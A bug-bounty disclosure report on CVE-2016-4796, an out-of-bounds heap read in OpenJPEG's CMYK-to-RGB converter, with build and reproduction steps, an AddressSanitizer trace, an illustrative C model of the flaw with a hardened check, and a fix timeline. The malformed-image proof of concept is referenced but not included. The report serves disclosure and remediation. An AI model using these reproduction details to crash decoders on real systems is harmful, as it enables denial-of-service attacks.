CVE-2016-4796 OpenJPEG color_cmyk_to_rgb Out-of-Bounds Read Vulnerability
Internet Bug Bounty
Reported by binvul
Vulnerability Details
Technical details and impact analysis
# CVE-2016-4796 OpenJPEG color_cmyk_to_rgb Out-of-Bounds Read Vulnerability
## 1. About OpenJPEG
OpenJPEG is an open-source JPEG 2000 codec written in C. It is packaged by many Linux distributions, including Ubuntu, Red Hat, Debian and Fedora. The official repository of the OpenJPEG project is available at [GitHub](https://github.com/uclouvain/openjpeg).
## 2. Credit
This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB.
## 3. Testing Environments
+ **OS**: Ubuntu
+ **OpenJPEG**: [44a499f](https://github.com/uclouvain/openjpeg/archive/44a499f2acf10b55172d07abf387e5a579a585f7.zip) (Master version before May/6/2016)
+ **Compiler**: Clang
+ **CFLAGS**: ``-g -O0 -fsanitize=address``
## 4. Reproduce Steps
Copy the proof-of-concept file ``poc.j2k`` into the ``openjpeg/bin`` directory before running ``opj_decompress``; the build steps below do not create it.
```
wget https://github.com/uclouvain/openjpeg/archive/44a499f2acf10b55172d07abf387e5a579a585f7.zip
unzip -q 44a499f2acf10b55172d07abf387e5a579a585f7.zip
mv openjpeg-44a499f2acf10b55172d07abf387e5a579a585f7 openjpeg
cd openjpeg
export CC='/usr/bin/clang -g -O0 -fsanitize=address'
cmake .
make
cd bin
./opj_decompress -o image.pgm -i poc.j2k
```
## 5. Vulnerability Details
AddressSanitizer reports the following error. The faulting access is a 4-byte read located 0 bytes past the end of a 4-byte heap region, i.e. one 32-bit sample beyond a single-sample component buffer that ``opj_j2k_update_image_data`` allocated with ``opj_calloc``. ASan labels every out-of-bounds heap access a heap-buffer-overflow, which is why its summary uses that term for what is an out-of-bounds read in ``color_cmyk_to_rgb``.
```
==118074==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000eed4
at pc 0x000000531212 bp 0x7ffce9cd43c0 sp 0x7ffce9cd43b8
READ of size 4 at 0x60200000eed4 thread T0
#0 0x531211 in color_cmyk_to_rgb openjpeg/src/bin/common/color.c:872:15
#1 0x4f20c1 in main openjpeg/src/bin/jp2/opj_decompress.c:1378:4
#2 0x7f3e59d9082f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
#3 0x41a978 in _start (openjpeg/bin/opj_decompress+0x41a978)
0x60200000eed4 is located 0 bytes to the right of 4-byte region [0x60200000eed0,0x60200000eed4)
allocated by thread T0 here:
#0 0x4bac30 in calloc (openjpeg/bin/opj_decompress+0x4bac30)
#1 0x7f3e5b68cc44 in opj_calloc openjpeg/src/lib/openjp2/opj_malloc.c:203:10
#2 0x7f3e5b60032a in opj_j2k_update_image_data openjpeg/src/lib/openjp2/j2k.c:8221:62
#3 0x7f3e5b5ffd36 in opj_j2k_decode_tiles openjpeg/src/lib/openjp2/j2k.c:9764:23
#4 0x7f3e5b5c87ed in opj_j2k_exec openjpeg/src/lib/openjp2/j2k.c:7350:41
#5 0x7f3e5b5db8be in opj_j2k_decode openjpeg/src/lib/openjp2/j2k.c:9955:15
#6 0x7f3e5b616b3e in opj_jp2_decode openjpeg/src/lib/openjp2/jp2.c:1492:8
#7 0x7f3e5b633806 in opj_decode openjpeg/src/lib/openjp2/openjpeg.c:412:10
#8 0x4f166f in main openjpeg/src/bin/jp2/opj_decompress.c:1332:10
#9 0x7f3e59d9082f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
SUMMARY: AddressSanitizer: heap-buffer-overflow openjpeg/src/bin/common/color.c:872:15 in color_cmyk_to_rgb
Shadow bytes around the buggy address:
0x0c047fff9d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9d90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa[04]fa fa fa fd fd
0x0c047fff9de0: fa fa fd fd fa fa 00 fa fa fa fd fd fa fa 04 fa
0x0c047fff9df0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==118074==ABORTING
```
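The trace is consistent with a converter that sizes its loop from the first component while another, subsampled component holds fewer samples. The block below is an added example written for this page; it is not OpenJPEG code and not the upstream fix. It models that bug class in plain C: ``comp_t`` mirrors only the ``opj_image_comp_t`` members a CMYK converter touches (``dx``, ``dy``, ``w``, ``h``, ``prec``, ``data``); the function names, the constructed images and the geometry check are assumptions. ``cmyk_first_overread`` reports, without performing the read, which plane a loop bounded by ``comps[0].w * comps[0].h`` would run past; ``cmyk_to_rgb_checked`` refuses such an image before touching any sample data and converts a consistent one in place.

```c
/* Added example, not OpenJPEG code: a model of the bug class behind
 * CVE-2016-4796.  comp_t mirrors the opj_image_comp_t members the converter
 * uses (dx, dy, w, h, prec, data); images, names and the check are assumed. */
#include <stdio.h>
#include <stdlib.h>

typedef struct {
    unsigned int dx, dy;   /* subsampling factors */
    unsigned int w, h;     /* plane size: a subsampled plane is smaller */
    unsigned int prec;     /* sample precision in bits */
    int *data;             /* exactly w*h samples */
} comp_t;
typedef struct { unsigned int numcomps; comp_t comps[4]; } image_t;

/* Vulnerable pattern: max = comps[0].w*comps[0].h indexes all four planes.
 * Without reading anything, return the first plane such a loop would run
 * past (or the first missing plane), -1 if none. */
int cmyk_first_overread(const image_t *img)
{
    unsigned int max = img->comps[0].w * img->comps[0].h, c;
    if (img->numcomps < 4)
        return (int)img->numcomps;
    for (c = 1; c < 4; c++)
        if (img->comps[c].w * img->comps[c].h < max)
            return (int)c;
    return -1;
}

/* Hardened converter: reject planes that differ in geometry or precision,
 * then apply R = 255*(1-C)*(1-K) etc. in place on comps[0..2].
 * Returns 0 on success, -1 on rejection. */
int cmyk_to_rgb_checked(image_t *img)
{
    const comp_t *c0 = &img->comps[0];
    unsigned int c, i, max;
    float s;
    if (img->numcomps < 4 || c0->prec == 0 || c0->prec > 31)
        return -1;
    for (c = 1; c < 4; c++) {
        const comp_t *cc = &img->comps[c];
        if (cc->dx != c0->dx || cc->dy != c0->dy || cc->w != c0->w ||
            cc->h != c0->h || cc->prec != c0->prec)
            return -1;                      /* the read the PoC triggers */
    }
    max = c0->w * c0->h;
    s = 1.0F / (float)((1u << c0->prec) - 1);   /* sample -> [0,1] */
    for (i = 0; i < max; i++) {
        float C = 1.0F - (float)img->comps[0].data[i] * s;
        float M = 1.0F - (float)img->comps[1].data[i] * s;
        float Y = 1.0F - (float)img->comps[2].data[i] * s;
        float K = 1.0F - (float)img->comps[3].data[i] * s;
        img->comps[0].data[i] = (int)(255.0F * C * K);   /* R */
        img->comps[1].data[i] = (int)(255.0F * M * K);   /* G */
        img->comps[2].data[i] = (int)(255.0F * Y * K);   /* B */
    }
    img->numcomps = 3;     /* K consumed; caller still frees its buffer */
    return 0;
}

/* Constructed 2x2 8-bit image, all planes full resolution, C=1 M=Y=K=0. */
image_t *make_consistent_image(void)
{
    image_t *img = calloc(1, sizeof *img);
    unsigned int c, i;
    img->numcomps = 4;
    for (c = 0; c < 4; c++) {
        img->comps[c].dx = img->comps[c].dy = 1;
        img->comps[c].w = img->comps[c].h = 2;
        img->comps[c].prec = 8;
        img->comps[c].data = calloc(4, sizeof(int));
    }
    for (i = 0; i < 4; i++) img->comps[0].data[i] = 255;   /* C = 1.0 */
    return img;
}

/* Constructed image shaped like the PoC: K is subsampled 2x2, so it holds
 * one 4-byte sample (the ASan region) while comps[0] has four. */
image_t *make_mismatched_image(void)
{
    image_t *img = make_consistent_image();
    free(img->comps[3].data);
    img->comps[3].dx = img->comps[3].dy = 2;
    img->comps[3].w = img->comps[3].h = 1;
    img->comps[3].data = calloc(1, sizeof(int));
    return img;
}

void free_image(image_t *img)
{
    unsigned int c;
    for (c = 0; c < 4; c++) free(img->comps[c].data);
    free(img);
}

int main(void)
{
    image_t *bad = make_mismatched_image(), *good = make_consistent_image();
    int ob = cmyk_first_overread(bad), og = cmyk_first_overread(good);
    printf("PoC-like image: over-read plane %d, checked convert %d\n",
           ob, cmyk_to_rgb_checked(bad));
    printf("consistent image: over-read plane %d, checked convert %d\n",
           og, cmyk_to_rgb_checked(good));
    printf("pixel 0: R=%d G=%d B=%d\n", good->comps[0].data[0],
           good->comps[1].data[0], good->comps[2].data[0]);
    free_image(bad);
    free_image(good);
    return 0;
}
```

The check compares ``dx``, ``dy``, ``w``, ``h`` and ``prec`` rather than only the buffer lengths, because a plane with the same sample count but different subsampling would still be converted pixel for pixel against the wrong neighbours; rejecting the image is the conservative choice for a decoder that cannot resample here.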
## 6. Timeline
+ 2016.05.05 - Found
+ 2016.05.06 - Reported to OpenJPEG via [Issue774](https://github.com/uclouvain/openjpeg/issues/774)
+ 2016.05.09 - Fixed
Related CVEs
Associated Common Vulnerabilities and Exposures
CVE-2016-4796
Heap-based buffer overflow in the color_cmyk_to_rgb in common/color.c in OpenJPEG before 2.1.1 allows remote attackers to cause a denial of service (crash) via a crafted .j2k file.
Report Details
Additional information and metadata
State: Closed
Substate: Resolved
Weakness: Memory Corruption - Generic